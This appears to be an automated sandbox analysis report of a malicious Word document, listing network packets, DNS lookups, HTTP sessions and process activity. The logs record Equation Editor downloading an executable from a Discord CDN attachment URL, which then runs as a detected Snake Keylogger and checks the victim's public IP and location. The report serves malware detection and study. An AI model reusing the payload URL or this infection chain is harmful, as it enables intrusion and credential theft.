                                      Mar 12, 2021 17:19:46.687272072 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.687298059 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.687325001 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.687336922 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.688029051 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.688054085 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.688091993 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.688766956 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.688792944 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.688821077 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.688832045 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.689836025 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.689855099 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.689915895 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.690179110 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.690198898 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.690232038 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.690241098 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.690912962 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.690934896 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.690958977 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.690969944 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.691663027 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.691684961 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.691725969 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.692327023 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.692373037 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.692397118 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.692424059 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.692437887 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.693079948 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.693104029 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.693151951 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.693171978 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.693814039 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.693839073 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.693871021 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.693893909 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.694530964 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.694555998 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.694591999 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.694603920 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.695221901 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.695245981 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.695282936 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.695297003 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.695949078 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.695971012 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.696010113 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.696022034 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.696633101 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.696660042 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.696693897 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.696706057 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.697369099 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.697423935 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.697427988 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.697465897 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.698050022 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.698074102 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.698117971 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.698878050 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.698898077 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.698931932 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.698945045 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.699412107 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.699433088 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.699465036 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.699474096 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.700129986 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.700151920 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.700208902 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.700773954 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.700795889 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.700807095 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.700828075 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.700846910 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.701420069 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.701442003 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.701464891 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.701495886 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.701513052 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.702128887 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.702157021 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.702184916 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.702199936 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.702836037 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.702861071 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.702899933 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.703389883 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.703417063 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.703428030 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.703435898 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.703445911 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.703470945 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.704372883 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.704402924 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.704421043 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.704442024 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.704461098 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.705338955 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.705347061 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.705363989 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.705398083 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.705419064 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:46.705902100 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.705919981 CET44349166162.159.135.233192.168.2.22
                                      Mar 12, 2021 17:19:46.705971956 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:47.469018936 CET49166443192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:47.469033957 CET4916580192.168.2.22162.159.135.233
                                      Mar 12, 2021 17:19:51.573807955 CET4916780192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:51.724133968 CET8049167131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:51.725002050 CET4916780192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:51.725033045 CET4916780192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:51.873749018 CET8049167131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:51.873780966 CET8049167131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:51.873795986 CET8049167131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:51.873857975 CET4916780192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:51.877968073 CET4916780192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:51.995203972 CET4916880192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:52.027767897 CET8049167131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:52.144231081 CET8049168131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:52.144304991 CET4916880192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:52.144711018 CET4916880192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:52.294812918 CET8049168131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:52.294848919 CET8049168131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:52.294864893 CET8049168131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:52.294939041 CET4916880192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:52.295492887 CET4916880192.168.2.22131.186.161.70
                                      Mar 12, 2021 17:19:52.445535898 CET8049168131.186.161.70192.168.2.22
                                      Mar 12, 2021 17:19:52.457438946 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:52.498696089 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:52.498789072 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:52.529000044 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:52.571985006 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:52.574151993 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:52.574178934 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:52.574242115 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:52.588434935 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:52.631197929 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:52.632292032 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:52.836827040 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:52.879637957 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:52.879722118 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:53.015079021 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:19:53.056480885 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:53.066703081 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:53.066732883 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:19:53.066792965 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:21:33.078377962 CET49169443192.168.2.22104.21.19.200
                                      Mar 12, 2021 17:21:33.122273922 CET44349169104.21.19.200192.168.2.22
                                      Mar 12, 2021 17:21:33.122471094 CET49169443192.168.2.22104.21.19.200

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Mar 12, 2021 17:19:45.716893911 CET5219753192.168.2.228.8.8.8
                                      Mar 12, 2021 17:19:45.770654917 CET53521978.8.8.8192.168.2.22
                                      Mar 12, 2021 17:19:45.770934105 CET5219753192.168.2.228.8.8.8
                                      Mar 12, 2021 17:19:45.824160099 CET53521978.8.8.8192.168.2.22
                                      Mar 12, 2021 17:19:51.428560019 CET5309953192.168.2.228.8.8.8
                                      Mar 12, 2021 17:19:51.477334023 CET53530998.8.8.8192.168.2.22
                                      Mar 12, 2021 17:19:51.499751091 CET5283853192.168.2.228.8.8.8
                                      Mar 12, 2021 17:19:51.548418045 CET53528388.8.8.8192.168.2.22
                                      Mar 12, 2021 17:19:52.391732931 CET6120053192.168.2.228.8.8.8
                                      Mar 12, 2021 17:19:52.455441952 CET53612008.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Mar 12, 2021 17:19:45.716893911 CET192.168.2.228.8.8.80x80acStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.770934105 CET192.168.2.228.8.8.80x80acStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.428560019 CET192.168.2.228.8.8.80xf76aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.499751091 CET192.168.2.228.8.8.80x5410Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:52.391732931 CET192.168.2.228.8.8.80xd799Standard query (0)freegeoip.appA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Mar 12, 2021 17:19:45.770654917 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.770654917 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.770654917 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.770654917 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.770654917 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.824160099 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.824160099 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.824160099 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.824160099 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:45.824160099 CET8.8.8.8192.168.2.220x80acNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.477334023 CET8.8.8.8192.168.2.220xf76aNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                      Mar 12, 2021 17:19:51.477334023 CET8.8.8.8192.168.2.220xf76aNo error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.477334023 CET8.8.8.8192.168.2.220xf76aNo error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.477334023 CET8.8.8.8192.168.2.220xf76aNo error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.477334023 CET8.8.8.8192.168.2.220xf76aNo error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.477334023 CET8.8.8.8192.168.2.220xf76aNo error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.548418045 CET8.8.8.8192.168.2.220x5410No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                      Mar 12, 2021 17:19:51.548418045 CET8.8.8.8192.168.2.220x5410No error (0)checkip.dyndns.com131.186.161.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.548418045 CET8.8.8.8192.168.2.220x5410No error (0)checkip.dyndns.com216.146.43.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.548418045 CET8.8.8.8192.168.2.220x5410No error (0)checkip.dyndns.com162.88.193.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.548418045 CET8.8.8.8192.168.2.220x5410No error (0)checkip.dyndns.com131.186.113.70A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:51.548418045 CET8.8.8.8192.168.2.220x5410No error (0)checkip.dyndns.com216.146.43.71A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:52.455441952 CET8.8.8.8192.168.2.220xd799No error (0)freegeoip.app104.21.19.200A (IP address)IN (0x0001)
                                      Mar 12, 2021 17:19:52.455441952 CET8.8.8.8192.168.2.220xd799No error (0)freegeoip.app172.67.188.154A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • cdn.discordapp.com
                                      • checkip.dyndns.org

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.2249165162.159.135.23380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      TimestampkBytes transferredDirectionData
                                      Mar 12, 2021 17:19:45.887872934 CET1OUTGET /attachments/819674896988242004/819677189900861500/harcout.exe HTTP/1.1
                                      Accept: */*
                                      Accept-Encoding: gzip, deflate
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: cdn.discordapp.com
                                      Connection: Keep-Alive
                                      Mar 12, 2021 17:19:45.947659016 CET1INHTTP/1.1 301 Moved Permanently
                                      Date: Fri, 12 Mar 2021 16:19:45 GMT
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Cache-Control: max-age=3600
                                      Expires: Fri, 12 Mar 2021 17:19:45 GMT
                                      Location: https://cdn.discordapp.com/attachments/819674896988242004/819677189900861500/harcout.exe
                                      cf-request-id: 08c8d5b0840000425d90805000000001
                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=CL4FVxOhApUMwQQEQS31RHucAL8mO9EpVUDsEpur1j2zd8rdcGLCPqVgBMxzw2bYB%2Bjx0tWmjERHlUVAi0PYciyiwj273wv7hrnEhha%2FtbGXfuk%3D"}],"max_age":604800,"group":"cf-nel"}
                                      NEL: {"max_age":604800,"report_to":"cf-nel"}
                                      Server: cloudflare
                                      CF-RAY: 62ee58940edf425d-LHR
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                      Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.2249167131.186.161.7080C:\Users\user\AppData\Roaming\hbmaqbo.exe
                                      TimestampkBytes transferredDirectionData
                                      Mar 12, 2021 17:19:51.725033045 CET422OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Mar 12, 2021 17:19:51.873780966 CET422INHTTP/1.1 200 OK
                                      Content-Type: text/html
                                      Server: DynDNS-CheckIP/1.0.1
                                      Connection: close
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      Content-Length: 103
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.78</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.2249168131.186.161.7080C:\Users\user\AppData\Roaming\hbmaqbo.exe
                                      TimestampkBytes transferredDirectionData
                                      Mar 12, 2021 17:19:52.144711018 CET423OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Mar 12, 2021 17:19:52.294848919 CET423INHTTP/1.1 200 OK
                                      Content-Type: text/html
                                      Server: DynDNS-CheckIP/1.0.1
                                      Connection: close
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      Content-Length: 103
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 37 38 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.78</body></html>


                                      HTTPS Packets

                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                      Mar 12, 2021 17:19:46.107748985 CET162.159.135.233443192.168.2.2249166CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IETue Jan 19 01:00:00 CET 2021 Mon Jan 27 13:48:08 CET 2020Wed Jan 19 00:59:59 CET 2022 Wed Jan 01 00:59:59 CET 2025771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                      CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025
                                      Mar 12, 2021 17:19:52.574178934 CET104.21.19.200443192.168.2.2249169CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Aug 10 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Tue Aug 10 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                      CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                      Code Manipulations

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:17:19:31
                                      Start date:12/03/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                      Imagebase:0x13f3b0000
                                      File size:1424032 bytes
                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:17:19:32
                                      Start date:12/03/2021
                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                      Imagebase:0x400000
                                      File size:543304 bytes
                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:17:19:33
                                      Start date:12/03/2021
                                      Path:C:\Users\user\AppData\Roaming\hbmaqbo.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\hbmaqbo.exe
                                      Imagebase:0x1340000
                                      File size:390144 bytes
                                      MD5 hash:9B568603BDDF210CA155C59A846E206A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2081428524.00000000037BC000.00000004.00000001.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 23%, ReversingLabs
                                      Reputation:low

                                      General

                                      Start time:17:19:36
                                      Start date:12/03/2021
                                      Path:C:\Users\user\AppData\Roaming\hbmaqbo.exe
                                      Wow64 process (32bit):true
                                      Commandline:{path}
                                      Imagebase:0x1340000
                                      File size:390144 bytes
                                      MD5 hash:9B568603BDDF210CA155C59A846E206A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_BedsObfuscator, Description: Yara detected Beds Obfuscator, Source: 00000005.00000002.2339543125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2339543125.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      General

                                      Start time:17:19:52
                                      Start date:12/03/2021
                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                      Imagebase:0x400000
                                      File size:543304 bytes
                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Executed Functions

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2078830422.0000000000360000.00000040.00000001.sdmp, Offset: 00360000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: C8E;$N)rO$N)rO5^x
                                        • API String ID: 0-1013641275
                                        • Opcode ID: 63381d233420d72832ffefc076bbbb1807ba14e370a0810709075405e602d247
                                        • Instruction ID: 6667e649fc956513a90a18970884d404f981e7a97e657bfe593152b15dd712f6
                                        • Opcode Fuzzy Hash: 63381d233420d72832ffefc076bbbb1807ba14e370a0810709075405e602d247
                                        • Instruction Fuzzy Hash: 2D61F970E05609DFDB04CFA5C9415AEFBF2EF88301F24D46AD419AB658D7349A41CFA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Strings
                                        Memory Dump Source
